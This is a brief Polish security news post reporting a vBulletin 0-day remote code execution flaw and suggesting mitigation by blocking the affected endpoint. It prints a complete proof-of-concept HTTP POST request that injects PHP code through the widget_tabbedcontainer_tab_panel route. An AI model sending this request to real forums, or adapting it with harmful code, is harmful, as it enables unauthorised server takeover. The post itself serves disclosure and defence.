-15% na nową książkę sekuraka: Wprowadzenie do bezpieczeństwa IT. Przy zamówieniu podaj kod: 10000

0-day na vBulletin, możliwość wykonania dowolnego kodu

11 sierpnia 2020, 10:11 | W biegu | 0 komentarzy

Dwa dni temu, Amir Etemadieh opublikował na swoim blogu posta, w którym opisuje błąd w systemie forum vBulletin.

Exploitacja możliwa jest przez wykonanie prostego zapytania:

POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: nazwa_hosta.pl

subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();

Podatność została zauważona dzięki analizie wcześniejszej podatności w tym samym silniku, oznaczonej symbolem CVE-2019-16759 (na Sekuraku też o niej wspominaliśmy).

Jak na razie producent nie wydał łatki, więc jeśli macie w swojej infrastrukturze vBulletin to warto dokładnie go monitorować, ew. zablokować dostęp do widget_tabbedcontainer_tab_panel.

— mb

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

Odpowiedz